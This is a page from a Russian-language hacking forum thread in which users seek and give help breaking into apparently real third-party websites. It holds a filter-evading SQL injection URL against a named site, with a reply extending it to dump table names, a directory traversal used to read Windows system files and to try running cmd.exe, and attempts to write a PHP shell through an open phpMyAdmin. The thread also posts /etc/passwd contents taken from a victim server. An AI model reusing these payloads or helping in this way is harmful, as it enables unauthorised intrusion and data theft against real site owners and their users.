FORUMS

MEMBERS

ANTICHAT — форум по информационной безопасности, OSINT и технологиям

ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию. Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club, и теперь снова доступен на новом адресе — forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.

		Форум АНТИЧАТ > БЕЗОПАСНОСТЬ И УЯЗВИМОСТИ > Уязвимости
Ваши вопросы по уязвимостям.

Страница 2268 из 2422

2268

Опции темы

Поиск в этой теме

Опции просмотра

19.11.2013, 13:47

-=Cerberus=-

Guest

Сообщений: n/a

Провел на форуме:
343026

Репутация: 391

HeaVeNSeR

может попробывать, написать скрипт который нонстоп будет лить шел на сервер, а ты в браузере нонстоп будешь дергать шелл.

расскажешь потом получилось или нет)

19.11.2013, 15:42

andrxx

Guest

Сообщений: n/a

Провел на форуме:
2764

Репутация: 0

други помогите скуль докрутить, кое как обошел фильтры не могу теперь имена таблиц и юзеров вывести

Цитата:

Сообщение от None

http://www.founddoo.com/profile/viewitem/?view=1538&item=201'+/*!%0Dunion%0Dselect%0D*FROM(select%201)%20a1%20joi n%20(select%20version())%20a2%20join%20(select%203 )%20a3%20join%20(select%204)%20a4%20join%20(select %205)%20a5%20join%20(select%206)%20a6%20join%20(se lect%207)%20a7%20join%20(select%208)%20a8%20join%2 0(select%209)%20a9%20join%20(select%2010)%20a10%20 join%20(select%2011)%20a11%20join%20(select%2012)% 20a12*/+--+

19.11.2013, 16:02

YaBtr

Guest

Сообщений: n/a

Провел на форуме:
132418

Репутация: 652

Цитата:

Сообщение от andrxx

andrxx said:
други помогите скуль докрутить, кое как обошел фильтры не могу теперь имена таблиц и юзеров вывести

Обходится следующим способом:

Цитата:

Сообщение от None

www.founddoo.com/profile/viewitem/?view=1538&item=201'+/*!%0Dunion%0Dselect*FROM(select 1)a1 join(select 2)a2 join(select
table_name from(information_schema.tables)
)a3 join(select 4)a4 join(select 5)a5 join(select 6)a6 join(select 7)a7 join(select 8)a8 join(select 9)a9 join(select 10)a10 join(select 11)a11 join(select 12)a12*/+--+

Дальше сам.

19.11.2013, 21:17

ex'pert

Guest

Сообщений: n/a

Провел на форуме:
6871

Репутация: -3

Доброго времени суток,

есть сайт с возможностью просмотреть файлы из виндоувс папки, (Directory traversal vuln) например:

Код:

Code:
?action=../../../../../../../../../../windows/System.ini%00.jpg

Вопрос можно ли выполнить запрос к командной строке? например послать команду выключения.. пробывал так:

Код:

Code:
action=../../../../../../../../../../windows/system32/cmd.exe-shutdown%20-t%200%00.jpg

непомогло. помогите разобратся(

21.11.2013, 15:15

chado

Guest

Сообщений: n/a

Провел на форуме:
1297

Репутация: 0

phpmyadmin

Пускает в админку phpmyadmin под любым логином, но после выполнения SQL запроса выдает:

Код:

Code:
Ответ MySQL: Документация
#1142 - SELECT command denied to user ''@'localhost' for table 'pma_bookmark'

При этом средствами phpmaydmin я могу создавать в таблице ячейки, менять их значение. Как нибудь можно повысить себе привилегии или залить шелл?

В ответ на

Код:

Code:
SELECT  ''
FROM test
INTO OUTFILE  '/usr/www/site/wwwfiles/phpmyadmin/s.php'

выдает:

Код:

Code:
Ответ MySQL: Документация
#1045 - Access denied for user ''@'localhost' (using password: NO)

Также есть уязвимость в phpmyadmin/export.php?what=sql, открывает sql.php в той же директории. Но при попытке выйти за пределы директории командой ../../../sql, открывает тот же файл. Две точки превращает в ./

21.11.2013, 19:20

qaz

Guest

Сообщений: n/a

Провел на форуме:
344922

Репутация: 75

Цитата:

Сообщение от chado

chado said:
Пускает в админку phpmyadmin под любым логином, но после выполнения SQL запроса выдает:

Код:

Code:
Ответ MySQL: Документация
#1142 - SELECT command denied to user ''@'localhost' for table 'pma_bookmark'

Код:

Code:
SELECT  ''
FROM test
INTO OUTFILE  '/usr/www/site/wwwfiles/phpmyadmin/s.php'

выдает:

Код:

Code:
Ответ MySQL: Документация
#1045 - Access denied for user ''@'localhost' (using password: NO)

врятли ты как-то права сможешь повысить, а чё, сменить пасс админки через phpmyadmin и залится ам - не вариант?

22.11.2013, 10:11

chado

Guest

Сообщений: n/a

Провел на форуме:
1297

Репутация: 0

Цитата:

Сообщение от qaz

qaz said:
врятли ты как-то права сможешь повысить, а чё, сменить пасс админки через phpmyadmin и залится ам - не вариант?

Я походу вообще без прав в phpmyadmin. information_schema даже читать не могу, изменения могу вносить только в таблицу test. Думал может можно через изменение этой таблицы что нибудь да залить)

22.11.2013, 23:16

kingbeef

Новичок

Регистрация: 08.04.2010

Сообщений: 1

Провел на форуме:
70640

Репутация: 0

Кто нибудь обходил waf хостинга hostgator.com на связку union select ?

23.11.2013, 23:48

winstrool

Познающий

Регистрация: 06.03.2007

Сообщений: 59

Провел на форуме:
371875

Репутация: 137

Цитата:

Сообщение от kingbeef

kingbeef said:
Кто нибудь обходил waf хостинга hostgator.com на связку union select ?

Вылажите ссылку уязвимую сего хостинга, а потестив люди скажут, что да как...

#10

24.11.2013, 15:05

chado

Guest

Сообщений: n/a

Провел на форуме:
1297

Репутация: 0

Цитата:

Сообщение от chado

chado said:
Я походу вообще без прав в phpmyadmin. information_schema даже читать не могу, изменения могу вносить только в таблицу test. Думал может можно через изменение этой таблицы что нибудь да залить)

С помощью LOAD DATA LOCAL INFILE '/etc/passwd' INTO TABLE test вывел содержимое в таблицу:

Код:

Code:
"# $FreeBSD: src/etc/master.passwd,v 1.40.22.1.4.1 2010/06/14 02:09:06 kensmith Exp $",
"#",
"root:*:0:0:Charlie &:/root:/bin/csh",
"toor:*:0:0:Bourne-again Superuser:/root:",
"daemon:*:1:1:Owner of many system processes:/root:/usr/sbin/nologin",
"operator:*:2:5:System &:/:/usr/sbin/nologin",
"bin:*:3:7:Binaries Commands and Source:/:/usr/sbin/nologin",
"tty:*:4:65533:Tty Sandbox:/:/usr/sbin/nologin",
"kmem:*:5:65533:KMem Sandbox:/:/usr/sbin/nologin",
"games:*:7:13:Games pseudo-user:/usr/games:/usr/sbin/nologin",
"news:*:8:8:News Subsystem:/:/usr/sbin/nologin",
"man:*:9:9:Mister Man Pages:/usr/share/man:/usr/sbin/nologin",
"sshd:*:22:22:Secure Shell Daemon:/var/empty:/usr/sbin/nologin",
"smmsp:*:25:25:Sendmail Submission User:/var/spool/clientmqueue:/usr/sbin/nologin",
"mailnull:*:26:26:Sendmail Default User:/var/spool/mqueue:/usr/sbin/nologin",
"bind:*:53:53:Bind Sandbox:/:/usr/sbin/nologin",
"proxy:*:62:62:Packet Filter pseudo-user:/nonexistent:/usr/sbin/nologin",
"_pflogd:*:64:64:pflogd privsep user:/var/empty:/usr/sbin/nologin",
"_dhcp:*:65:65:dhcp programs:/var/empty:/usr/sbin/nologin",
"uucp:*:66:66:UUCP pseudo-user:/var/spool/uucppublic:/usr/local/libexec/uucp/uucico",
"pop:*:68:6:Post Office Owner:/nonexistent:/usr/sbin/nologin",
"www:*:80:80:World Wide Web Owner:/nonexistent:/usr/sbin/nologin",
"nobody:*:65534:65534:Unprivileged user:/nonexistent:/usr/sbin/nologin",
"zeus:*:1001:0:User &:/home/zeus:/bin/csh",
"mysql:*:1002:1001:User &:/home/mysql:/bin/sh",
"foux:*:1003:1003:User &:/home/foux:/bin/sh",
"freeradius:*:1004:1004:User &:/home/freeradius:/bin/sh",
"natusik:*:1005:1005:User &:/usr/www/natusik:/bin/csh",
"roman:*:1006:1006:User &:/usr/www/romankom.ru:/bin/csh",
"roman1:*:1007:1007:User &:/usr/www/kisika.ru:/bin/csh",
"misha:*:1008:0:Mihail Tihomirov:/home/misha:/bin/csh",

Собственно вопрос, где искать пароли? * означает любой пароль? И что я смогу сделать дальше, ftp порт закрыт, mysql порт открыт но не дает соединиться с моего IP. В config.inc.php в папке \phpmyadmin\:

Код:

Code:
"$cfg['Servers'][$i]['host']          = 'localhost'; // MySQL hostname or IP address",
"$cfg['Servers'][$i]['port']          = '';          // MySQL port - leave blank for default port",
"$cfg['Servers'][$i]['socket']        = '';          // Path to the socket - leave blank for default socket",
"$cfg['Servers'][$i]['connect_type']  = 'tcp';       // How to connect to MySQL server ('tcp' or 'socket')",
"$cfg['Servers'][$i]['extension']     = 'mysql';     // The php MySQL extension to use ('mysql' or 'mysqli')",
"$cfg['Servers'][$i]['compress']      = FALSE;       // Use compressed protocol for the MySQL connection",
"                                                    // (requires PHP >= 4.3.0)",
"$cfg['Servers'][$i]['controluser']   = '';          // MySQL control user settings",
"                                                    // (this user must have read-only",
"$cfg['Servers'][$i]['controlpass']   = '';          // access to the ""mysql/user""",
"                                                    // and ""mysql/db"" tables).",
"                                                    // The controluser is also",
"                                                    // used for all relational",
"                                                    // features (pmadb)",
"$cfg['Servers'][$i]['auth_type']     = 'http';    // Authentication method (config, http or cookie based)?",
"$cfg['Servers'][$i]['user']          = 'root';      // MySQL user",
"$cfg['Servers'][$i]['password']      = '';          // MySQL password (only needed",
"                                                    // with 'config' auth_type)",

Страница 2268 из 2422

2268

« Предыдущая тема | Следующая тема »

Похожие темы
Тема	Автор	Раздел	Ответов	Последнее сообщение
Ваши ламерские приколы (Ну когда только комп появился)	PEPSICOLA	Болталка	188	23.05.2010 10:05
Ваши любимые компьютерные игры	PEPSICOLA	Болталка	280	19.08.2009 00:01
Ваши телеги...	F-IFTY	Болталка	13	18.08.2009 18:22
Вопросы по Ipb 2.0	Voodoo_People	Уязвимости CMS / форумов	26	15.02.2005 22:57

Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)

Быстрый переход

ANTICHAT.XYZ